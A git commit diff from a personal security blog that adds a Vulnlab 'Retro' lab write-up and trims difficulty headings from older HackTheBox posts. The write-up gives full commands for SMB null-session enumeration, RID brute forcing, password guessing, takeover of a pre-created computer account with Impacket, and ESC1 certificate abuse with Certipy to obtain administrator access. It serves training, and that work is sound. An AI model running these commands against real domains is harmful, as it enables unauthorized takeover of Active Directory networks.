Retro

limon768 · limon768 · commit 7e47da907633 · 2024-06-22T15:05:25.000-04:00
diff --git a/source/_posts/HackTheBox/2023-02-18-Beep.md b/source/_posts/HackTheBox/2023-02-18-Beep.md
@@ -16,10 +16,6 @@ title: Beep - HackTheBox
 
 Beep has a very large list of running services, which can make it a bit challenging to find the correct entry method. This machine can be overwhelming for some as there are many potential attack vectors. Luckily, there are several methods available for gaining access.
 
-### Difficulty:
-
-`Medium`
-
 
 # Fixes
 Due to this machine's age and the outdated TLS version, issues emerge.
diff --git a/source/_posts/HackTheBox/2023-03-04-Cronos.md b/source/_posts/HackTheBox/2023-03-04-Cronos.md
@@ -14,11 +14,8 @@ title: Cronos - HackTheBox
 
 
 
-Cronos is a medium Linux machine that focuses mainly on different vectors for enumeration and also emphasises the risks associated with adding world-writable files to the root crontab. This machine also includes an introductory-level SQL injection vulnerability
+Cronos is a **medium** Linux machine that focuses mainly on different vectors for enumeration and also emphasises the risks associated with adding world-writable files to the root crontab. This machine also includes an introductory-level SQL injection vulnerability
 
-### Difficulty:
-
-`Medium`
 
 
 # Enumeration
diff --git a/source/_posts/HackTheBox/2023-12-20-Jeeves.md b/source/_posts/HackTheBox/2023-12-20-Jeeves.md
@@ -15,9 +15,6 @@ title: Jeeves - HackTheBox
 
 Jeeves is not overly complicated, however, it focuses on some interesting techniques and provides a great learning experience. As the use of alternate data streams is not very common, some users may have a hard time locating the correct escalation path.  
 
-### Difficulty:
-
-`Medium`
 
 
 # Enumeration
diff --git a/source/_posts/Vulnlab/2024-06-22-Retro.md b/source/_posts/Vulnlab/2024-06-22-Retro.md
@@ -0,0 +1,177 @@
+---
+cover: https://photos.squarezero.dev/file/abir-images/Retro/logo.png
+date: 2024-06-22 09:45:47 +07:00
+modified: 2024-06-22 09:45:47 +07:00
+categories: Vulnlab
+machine_author: 
+  name: r0BIT
+  link: https://www.linkedin.com/in/robin-unglaub/
+tags: ["Nmap", "port scanning", "SMB enumeration", "null session", "RID brute forcing", "password guessing", "simple passwords", "Windows shares", "Pre-Windows 2000 Computers", "credential change", "Impacket", "ESC1 attack", "Active Directory Certificate Services", "Certipy", "Kerberos", "TGT request"]
+title: Retro - Vulnlab
+---
+
+![](https://photos.squarezero.dev/file/abir-images/htbasset/vulnbanner.png)
+
+Retro is an **easy** difficulty machine where I had to enumerate open ports and services, leverage LDAP and SMB services to gain initial access, utilize credential brute forcing to discover simple passwords, and employ Impacket and Certipy to change credentials and exploit an ESC1 vulnerability for privilege escalation. The final step involved obtaining a TGT for the administrator to capture the root flag.
+
+
+# Enumeration
+The Nmap scan shows the following ports.
+
+```Bash
+PORT      STATE SERVICE
+53/tcp    open  domain 
+88/tcp    open  kerberos-sec 
+135/tcp   open  msrpc
+139/tcp   open  netbios-ssn  
+389/tcp   open  ldap
+445/tcp   open  microsoft-ds 
+464/tcp   open  kpasswd5
+593/tcp   open  http-rpc-epmap
+636/tcp   open  ldapssl
+3268/tcp  open  globalcatLDAP
+3269/tcp  open  globalcatLDAPssl
+3389/tcp  open  ms-wbt-server
+9389/tcp  open  adws
+```
+
+Guest login is enabled in the machine and I can see the shares using a username and null password.
+`netexec smb ip -u 'sz' -p '' --shares`
+
+![](https://photos.squarezero.dev/file/abir-images/Retro/0.png)
+
+I also used rid brute force to get users into the system.
+`netexec smb ip -u 'sz' -p '' --rid-brute`
+
+![](https://photos.squarezero.dev/file/abir-images/Retro/1.png)
+
+# Password Guessing
+
+In the Trainees shares there is a text file where it talks about making an simple password for trainees.
+
+`smbclient "//10.10.81.244/Trainees" -U "sz" --password=''`
+
+```
+Dear Trainees,     
+I know that some of you seemed to struggle with remembering strong and unique passwords. 
+So we decided to bundle every one of you up into one account.
+Stop bothering us. Please. We have other stuff to do than resetting your password every day.                                                                                                                                                      
+                                                    
+Regards                                                                                                                                                                                                                                                                                            
+The Admins
+```
+
+Using the usernames earlier I can tried bruteforce with usernames as password and got **trainees:trainees** valid
+
+`netexec smb 10.10.81.244 -u user.txt -p user.txt -no-bruteforce`
+
+![](https://photos.squarezero.dev/file/abir-images/Retro/2.png)
+
+# Pre-Windows 2000 Computers
+
+I explored Notes share with trainee credentials and found another notes where it talked about **Pre Created Computer Account**
+`smbclient "//10.10.81.244/Notes" -U "trainee" --password='trainee'`
+
+![](https://photos.squarezero.dev/file/abir-images/Retro/3.png)
+
+```
+Thomas,
+       
+after convincing the finance department to get rid of their ancienct banking software 
+it is finally time to clean up the mess they made. We should start with the pre created computer account. That one is older than me.
+       
+Best   
+James
+```
+
+After researching for a little bit I found this 2 article where it talked about how I can change the credentials of **Pre-Windows 2000 Computers**.
+
+[The Hacker Recipes](https://www.thehacker.recipes/ad/movement/domain-settings/pre-windows-2000-computers)
+[Trustedsec](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts)
+
+![](https://photos.squarezero.dev/file/abir-images/Retro/4.png)
+
+As this is a financial department I used previously found user **banking** and got ***NT_STATUS_RESOURCE_NAME_NOT_FOUND*** which confirms its vulnerable.
+
+`smbclient -W retro.vl -U "banking" --password='banking' -L retro.vl`
+
+![](https://photos.squarezero.dev/file/abir-images/Retro/5.png)
+
+I also verified it with Netexec.
+
+![](https://photos.squarezero.dev/file/abir-images/Retro/6.png)
+
+Next, I used Impacket to change the credentials and also create alternative credentials.
+
+`impacket-changepasswd retro.vl/banking$:banking@10.10.105.52 -newpass Password123 -altuser trainee -altpass trainee`
+
+![](https://photos.squarezero.dev/file/abir-images/Retro/7.png)
+
+
+# ESC1
+
+Using the new credential I enumerated ADCS and the machine was vulnerable to ESC1 attack.
+
+`certipy find -u 'banking$' -p 'Password123' -dc-ip 10.10.105.52 -enabled -vulnerable -stdout`
+
+
+```bash
+Certificate Templates                   
+  0                                     
+    Template Name                       : RetroClients
+    Display Name                        : Retro Clients
+    Certificate Authorities             : retro-DC-CA 
+    Enabled                             : True        
+    Client Authentication               : True        
+    Enrollment Agent                    : False       
+    Any Purpose                         : False       
+    Enrollee Supplies Subject           : True        
+    Certificate Name Flag               : EnrolleeSuppliesSubject  
+    Enrollment Flag                     : None        
+    Private Key Flag                    : 16842752    
+    Extended Key Usage                  : Client Authentication 
+    Requires Manager Approval           : False       
+    Requires Key Archival               : False       
+    Authorized Signatures Required      : 0           
+    Validity Period                     : 1 year      
+    Renewal Period                      : 6 weeks     
+    Minimum RSA Key Length              : 4096        
+    Permissions                         
+      Enrollment Permissions            
+        Enrollment Rights               : RETRO.VL\Domain Admins
+                                          RETRO.VL\Domain Computers
+                                          RETRO.VL\Enterprise Admins
+      Object Control Permissions        
+        Owner                           : RETRO.VL\Administrator
+        Write Owner Principals          : RETRO.VL\Domain Admins
+                                          RETRO.VL\Enterprise Admins
+                                          RETRO.VL\Administrator
+        Write Dacl Principals           : RETRO.VL\Domain Admins
+                                          RETRO.VL\Enterprise Admins
+                                          RETRO.VL\Administrator
+        Write Property Principals       : RETRO.VL\Domain Admins
+                                          RETRO.VL\Enterprise Admins
+                                          RETRO.VL\Administrator
+    [!] Vulnerabilities                 
+      ESC1
+```
+
+Using Certipy I requested .pfx key using the vulnerable template. Because of the ***Key Size*** error, I specified the key-size
+
+`certipy req -u 'banking$'@retro.vl -p 'Password123' -dc-ip 10.10.105.52 -ca retro-DC-CA -template RetroClients -upn ADMINISTRATOR@retro.VL -key-size 4096`
+
+![](https://photos.squarezero.dev/file/abir-images/Retro/8.png)
+
+Next, Using the pfx key I requested TGT of the administrator.
+
+`certipy auth -pfx administrator.pfx -username Administrator -domain retro.vl -dc-ip 10.10.105.52`
+
+![](https://photos.squarezero.dev/file/abir-images/Retro/9.png)
+
+Using the TGT I can now login to the machine and get the flag.
+`wmiexec.py administrator@10.10.105.52 -hashes <.....redacted......>`
+
+![](https://photos.squarezero.dev/file/abir-images/Retro/10.png)
+
+
+
